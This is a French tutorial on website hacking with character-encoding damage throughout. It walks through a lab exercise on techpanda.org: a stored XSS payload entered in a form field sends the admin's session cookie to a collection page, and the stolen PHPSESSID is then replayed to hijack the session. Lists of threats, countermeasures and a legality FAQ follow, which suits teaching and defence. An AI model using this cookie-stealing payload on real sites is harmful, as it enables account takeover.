Comment pirater un site web ? Techniques de piratage de sites web

โšก Rรฉsumรฉ intelligent

Le piratage de sites web exploite les failles des applications web (code mal รฉcrit, entrรฉes non filtrรฉes et gestion des sessions dรฉfaillante) pour obtenir un accรจs non autorisรฉ. Cette page prรฉsente les techniques d'attaque courantes et, surtout, les contre-mesures permettant de sรฉcuriser un site web.

  • ๐ŸŒ Target: Les applications web acceptent les donnรฉes saisies par l'utilisateur via Internet, exposant ainsi tout champ non validรฉ ร  des attaques.
  • ???? Techniques: L'injection SQL, le cross-site scripting, l'empoisonnement de session, la falsification de formulaires et l'injection de code figurent en tรชte de liste.
  • (I.e. Dรฉtournement de session: Un identifiant de session volรฉ permet ร  un attaquant d'usurper l'identitรฉ d'un utilisateur connectรฉ sans mot de passe.
  • ๐Ÿ›ก๏ธ La dรฉfense: La validation des entrรฉes, les requรชtes paramรฉtrรฉes et les cookies de session chiffrรฉs comblent les lacunes courantes.
  • (I.e. Standard: Le Top 10 de l'OWASP dรฉfinit les vulnรฉrabilitรฉs web que tout dรฉveloppeur devrait tester.
  • ๐Ÿค– Avantage moderne : Les pare-feu dotรฉs d'intelligence artificielle apprennent ร  gรฉrer le trafic normal et signalent les tentatives d'injection en temps rรฉel.

Comment pirater un site Web

Plus de personnes que jamais ont accรจs ร  Internet. Cela a incitรฉ de nombreuses organisations ร  dรฉvelopper des applications Web que les utilisateurs peuvent utiliser en ligne pour interagir avec l'organisation. Un code mal รฉcrit pour les applications Web peut รชtre exploitรฉ pour obtenir un accรจs non autorisรฉ ร  des donnรฉes sensibles et ร  des serveurs Web.

Vous apprendrez les techniques courantes de piratage de sites web et les contre-mesures permettant de se protรฉger contre de telles attaques.

Comment pirater un site Web

Dans ce scรฉnario pratique de piratage de site Web, nous allons dรฉtourner la session utilisateur de l'application Web situรฉe ร  l'adresse www.techpanda.orgNous utiliserons une technique de script intersite pour lire l'identifiant de session du cookie, puis nous l'utiliserons pour usurper l'identitรฉ d'une session utilisateur lรฉgitime.

On part du principe que l'attaquant a accรจs ร  l'application web et souhaite dรฉtourner les sessions d'autres utilisateurs. L'objectif de cette attaque pourrait รชtre d'obtenir un accรจs administrateur ร  l'application, en supposant que le compte de l'attaquant dispose de droits d'accรจs limitรฉs.

ร‰tape 1) Ouvrez URL http://www.techpanda.org/.

ร€ des fins pratiques, il est fortement recommandรฉ d'obtenir un accรจs via une injection SQL. Voir : Cet article traite de l'injection SQL. pour plus d'informations sur la faรงon de procรฉder.

ร‰tape 2) Saisissez vos identifiants de connexion.

L'adresse e-mail de connexion est admin@google.com et le mot de passe est Password2010.

ร‰tape 3) Consultez le tableau de bord.

Si vous vous รชtes connectรฉ avec succรจs, vous obtiendrez le tableau de bord suivant.

Tableau de bord Techpanda affichรฉ aprรจs une connexion rรฉussie

ร‰tape 4) Saisir un nouveau contenu.

Cliquez sur Ajouter un nouveau contact et saisissez les informations suivantes comme prรฉnom :

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

ร‰tape 5) Ajouter JavaScรฉnario.

Le code ci-dessus utilise JavaScript. Il ajoute un lien hypertexte avec un รฉvรฉnement onclick. Lorsque l'utilisateur, sans s'en douter, clique sur le lien, l'รฉvรฉnement rรฉcupรจre le ID de session du cookie PHP et l'envoie ร  la page snatch_sess_id.php avec l'identifiant de session dans le URL.

Formulaire ยซ Ajouter un nouveau contact ยป avec un script malveillant saisi dans le champ ยซ Prรฉnom ยป.

ร‰tape 6) Ajouter des dรฉtails.

Saisissez les informations restantes comme indiquรฉ ci-dessous et cliquez sur Enregistrer les modifications.

Formulaire de contact rempli, prรชt ร  รชtre enregistrรฉ dans la base de donnรฉes

ร‰tape 7) Consultez le tableau de bord.

Votre tableau de bord ressemblera dรฉsormais ร  l'รฉcran suivant.

Tableau de bord des contacts affichant l'entrรฉe enregistrรฉe avec le lien Dark

ร‰tape 8) Vรฉrifier l'identifiant de session.

Le script intersite รฉtant stockรฉ dans la base de donnรฉes, il se charge ร  chaque connexion d'un utilisateur disposant des droits d'accรจs. Lorsque l'administrateur se connecte et clique sur le lien ยซ Dark ยป, une fenรชtre affichant l'identifiant de session apparaรฎt. URL.

Fenรชtre du navigateur affichant l'identifiant de session capturรฉ transmis dans le URL

Remarque : le script pourrait envoyer la valeur ร  un serveur distant oรน est stockรฉ le PHPSESSID, puis rediriger lโ€™utilisateur comme si de rien nโ€™รฉtait.

Remarque : la valeur que vous obtenez peut รชtre diffรฉrente de celle affichรฉe ici, mais le concept reste le mรชme.

Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

Remarque : lโ€™extension classique Tamper Data prรฉsentรฉe ci-dessous ne sโ€™installe plus sur les systรจmes actuels. Firefoxmais le concept qu'il illustre โ€” intercepter et modifier une requรชte HTTP pour rejouer une session capturรฉe โ€” reste inchangรฉ.

L'organigramme ci-dessous montre les รฉtapes que vous devez suivre pour rรฉaliser cet exercice.

Organigramme des รฉtapes de l'exercice d'imitation lors de la session

  • Vous aurez besoin du Firefox Navigateur Web pour cette section et module complรฉmentaire Tamper Data.
  • Ouvrez Firefox et installez le module complรฉmentaire comme indiquรฉ dans les schรฉmas ci-dessous.

Firefox Gestionnaire de modules complรฉmentaires utilisรฉ pour rechercher le module complรฉmentaire Tamper Data

Les donnรฉes de falsification rรฉpertoriรฉes dans le Firefox rรฉsultats de recherche d'extensions

  • Recherchez les donnรฉes de falsification, puis cliquez sur installer comme indiquรฉ ci-dessus.

Boรฎte de dialogue d'autorisation des modules complรฉmentaires avec le bouton Accepter et installer

  • Cliquez sur Accepter et installerโ€ฆ

Firefox invite ร  redรฉmarrer le navigateur aprรจs l'installation de l'extension

Firefox La barre de menus est activรฉe, le menu Outils est donc visible.

  • Cliquez sur ยซ Redรฉmarrer maintenant ยป une fois l'installation terminรฉe.
  • Activer la barre de menu dans Firefox si ce n'est pas affichรฉ.

Le menu Outils s'ouvre avec l'option Donnรฉes de falsification sรฉlectionnรฉe

  • Cliquez sur le menu Outils, puis sรฉlectionnez Altรฉration des donnรฉes comme indiquรฉ ci-dessous.

Vider la fenรชtre de donnรฉes de falsification avant de capturer les requรชtes

  • La fenรชtre suivante s'affichera. Remarque : si la fenรชtre n'est pas vide, cliquez sur le bouton ยซ Effacer ยป.

Une fenรชtre contextuelle vous invite ร  modifier les donnรฉes de la requรชte sortante.

  • Cliquez sur le menu Dรฉmarrer le Tamper.
  • Revenez ร  la Firefox Dans votre navigateur web, saisissez http://www.techpanda.org/dashboard.php, puis appuyez sur la touche Entrรฉe pour charger la page.
  • Vous recevrez la fenรชtre contextuelle suivante de Tamper Data.

Fenรชtre contextuelle de falsification avec les options Falsifier, Soumettre et Annuler

  • La fenรชtre contextuelle propose trois (3) options. L'option ยซ Modifier ยป permet de modifier les informations d'en-tรชte HTTP avant leur envoi au serveur.
  • Clique dessus.
  • Vous obtiendrez la fenรชtre suivante.

ร‰diteur d'en-tรชte de requรชte oรน la valeur du cookie peut รชtre remplacรฉe

  • Copiez l'identifiant de session PHP que vous avez copiรฉ lors de l'attaque. URL Collez-le aprรจs le signe รฉgal. Votre valeur devrait maintenant ressembler ร  ceci.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
  • Cliquez sur le bouton OK.
  • La fenรชtre contextuelle ยซ Donnรฉes altรฉrรฉes ยป s'affichera ร  nouveau.

La fenรชtre contextuelle ยซ Falsifier les donnรฉes ยป rรฉapparaรฎt avec la case ร  cocher ยซ Continuer la falsification ยป.

  • Dรฉcochez la case qui demande Continuer la falsification ?
  • Cliquez sur le bouton ยซ Soumettre ยป une fois terminรฉ.
  • Vous devriez voir le tableau de bord comme indiquรฉ ci-dessous.

Tableau de bord Techpanda accessible en rejouant la session enregistrรฉe

Remarque : nous ne nous sommes pas connectรฉs ; nous avons usurpรฉ une session de connexion en utilisant la valeur PHPSESSID que nous avons rรฉcupรฉrรฉe ร  l'aide d'un script intersite.

Qu'est-ce qu'une application Web ? Que sont les menaces Web ?

Une application web (ou site web) est une application basรฉe sur le modรจle client-serveur. Le serveur assure l'accรจs ร  la base de donnรฉes et la logique mรฉtier. Il est hรฉbergรฉ sur un serveur web. L'application cliente s'exรฉcute dans le navigateur web du client. Les applications web sont gรฉnรฉralement รฉcrites dans des langages tels queโ€ฆ Java, C#, VB.Net, PHPet le langage de balisage ColdFusion, etc. Les moteurs de bases de donnรฉes utilisรฉs dans les applications Web comprennent MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

Principales techniques de piratage de sites Web

La plupart des applications web sont hรฉbergรฉes sur des serveurs publics. serveurs Accessibles via Internet, ces applications web sont vulnรฉrables aux attaques du fait de leur facilitรฉ d'accรจs. Voici quelques menaces courantes qui pรจsent sur les applications web.

  • Injection SQL โ€“ le but de cette menace pourrait รชtre de contourner les algorithmes de connexion, de saboter les donnรฉes, etc.
  • Dรฉni de service Attaques โ€“ lโ€™objectif de cette menace pourrait รชtre dโ€™empรชcher les utilisateurs lรฉgitimes dโ€™accรฉder ร  la ressource.
  • XSS (Cross-Site Scripting) โ€“ Lโ€™objectif de cette menace pourrait รชtre dโ€™injecter du code exรฉcutable cรดtรฉ client, cรดtรฉ navigateur.
  • Empoisonnement des cookies/sessions โ€“ le but de cette menace est de modifier les cookies/donnรฉes de session par un attaquant pour obtenir un accรจs non autorisรฉ.
  • Falsification de formulaire โ€“ le but de cette menace est de modifier les donnรฉes des formulaires telles que les prix dans les applications de commerce รฉlectronique afin que l'attaquant puisse obtenir des articles ร  prix rรฉduits.
  • Code Injection โ€“ le but de cette menace est d'injecter du code tel que PHP, Python, etc. qui peuvent รชtre exรฉcutรฉs sur le serveur. Le code peut installer des portes dรฉrobรฉes, rรฉvรฉler des informations sensibles, etc.
  • Defacement โ€“ Lโ€™objectif de cette menace est de modifier la page affichรฉe sur un site web et de rediriger toutes les requรชtes de pages vers une seule page contenant le message de lโ€™attaquant.

Comment protรฉger votre site Web contre les piratages ?

Une organisation peut adopter la stratรฉgie suivante pour se protรฉger contre les attaques de serveur Web.

  • Injection SQL โ€“ Le nettoyage et la validation des paramรจtres utilisateur avant leur soumission ร  la base de donnรฉes pour traitement peuvent contribuer ร  rรฉduire les risques d'attaque par injection SQL. Les moteurs de bases de donnรฉes tels que MS SQL Server, MySQL, etc. prennent en charge les paramรจtres et les requรชtes prรฉparรฉes. Elles sont beaucoup plus sรปres que les requรชtes SQL traditionnelles.
  • Attaques de dรฉni de service Les pare-feu peuvent bloquer le trafic provenant d'adresses IP suspectes en cas d'attaque par dรฉni de service (DoS). Une configuration rรฉseau adรฉquate et un systรจme de dรฉtection d'intrusion contribuent รฉgalement ร  rรฉduire les risques de rรฉussite d'une telle attaque.
  • Script intersite โ€“ validation et nettoyage des en-tรชtes et des paramรจtres transmis via URLLes paramรจtres de formulaire et les valeurs cachรฉes peuvent contribuer ร  rรฉduire les attaques XSS.
  • Empoisonnement des cookies/sessions โ€“ cela peut รชtre รฉvitรฉ en chiffrant le contenu des cookies, en les faisant expirer aprรจs un certain temps et en associant les cookies ร  l'adresse IP du client qui a รฉtรฉ utilisรฉe pour les crรฉer.
  • Falsification de formulaire โ€“ cela peut รชtre รฉvitรฉ en validant et en vรฉrifiant les donnรฉes saisies par l'utilisateur avant de les traiter.
  • Code Injection On peut รฉviter ce problรจme en traitant tous les paramรจtres comme des donnรฉes et non comme du code exรฉcutable. La validation et l'assainissement des donnรฉes permettent d'y parvenir.
  • Defacement โ€“ un bon sรฉcuritรฉ des applications Web La politique de sรฉcuritรฉ doit garantir la correction des vulnรฉrabilitรฉs couramment exploitรฉes pour accรฉder au serveur web. Cela implique une configuration adรฉquate du systรจme d'exploitation, du logiciel serveur web et l'application des meilleures pratiques de sรฉcuritรฉ lors du dรฉveloppement.ping des applications Web.

Vรฉrifie รงa: 9 Meilleur URL Scanners pour vรฉrifier si un lien est sรปr face aux logiciels malveillants

FAQ

Uniquement avec l'autorisation รฉcrite du propriรฉtaire. Tester un site dont vous n'รชtes pas propriรฉtaire ou pour lequel vous n'รชtes pas autorisรฉ ร  accรฉder est illรฉgal, notamment en vertu de la loi amรฉricaine sur la fraude et l'abus informatique (Computer Fraud and Abuse Act). Les pรฉrimรจtres des programmes de primes aux bogues dรฉfinissent ce qui est autorisรฉ.

Soyez vigilant face aux pages dรฉfigurรฉes, aux nouveaux utilisateurs administrateurs inattendus, aux fichiers ou scripts inconnus, aux redirections vers des sites de spam et aux pics de trafic. La surveillance de l'intรฉgritรฉ des fichiers, l'analyse des journaux du serveur et un scanner de logiciels malveillants permettent de dรฉtecter rapidement la plupart des compromissions.

Le Top 10 de l'OWASP est une liste collaborative des risques de sรฉcuritรฉ les plus critiques pour les applications web. Son รฉdition 2025 classe en tรชte les failles de contrรดle d'accรจs, suivies des erreurs de configuration de sรฉcuritรฉ et des dรฉfaillances de la chaรฎne d'approvisionnement logicielle.

Un pare-feu applicatif web (WAF) inspecte le trafic HTTP entrant et bloque les attaques connues, telles que les injections SQL et les attaques XSS (Cross-Site Scripting), avant qu'elles n'atteignent l'application. Il propose une application de correctifs virtuels, mais ne remplace pas le code sรฉcurisรฉ.

Les pare-feu basรฉs sur l'IA analysent le trafic normal d'un site, puis signalent en temps rรฉel les anomalies telles que les tentatives d'injection, le bourrage d'identifiants et l'utilisation abusive de bots. Les modรจles d'apprentissage automatique dรฉtectent les failles zero-day que les rรจgles statiques ne repรจrent pas, rรฉduisant ainsi les faux positifs.

Les assistants IA comme Copilote GitHub Ces outils accรฉlรจrent la validation des entrรฉes et la crรฉation de requรชtes paramรฉtrรฉes, mais peuvent aussi suggรฉrer des schรฉmas non sรฉcurisรฉs. Considรฉrez chaque suggestion comme une รฉbauche et faites-la relire par un humain avant dรฉploiement.

Parmi les options populaires, on retrouve CEH, OSCP et CompTIA Security+, tandis que CISSP Ce document couvre l'architecture de sรฉcuritรฉ dans son ensemble. Il valide les compรฉtences en matiรจre d'รฉvaluation des vulnรฉrabilitรฉs, de configuration sรฉcurisรฉe et de dรฉfense attendues des employeurs pour les postes liรฉs ร  la sรฉcuritรฉ web.

L'analyse des vulnรฉrabilitรฉs est automatisรฉe et recense rapidement les failles connues sans les exploiter. Les tests d'intrusion, quant ร  eux, sont principalement rรฉalisรฉs manuellement ; les testeurs exploitent activement les failles pour dรฉmontrer leur impact rรฉel. L'analyse offre une vision d'ensemble, tandis que les tests d'intrusion offrent une vision approfondie.

Rรฉsumez cet article avec :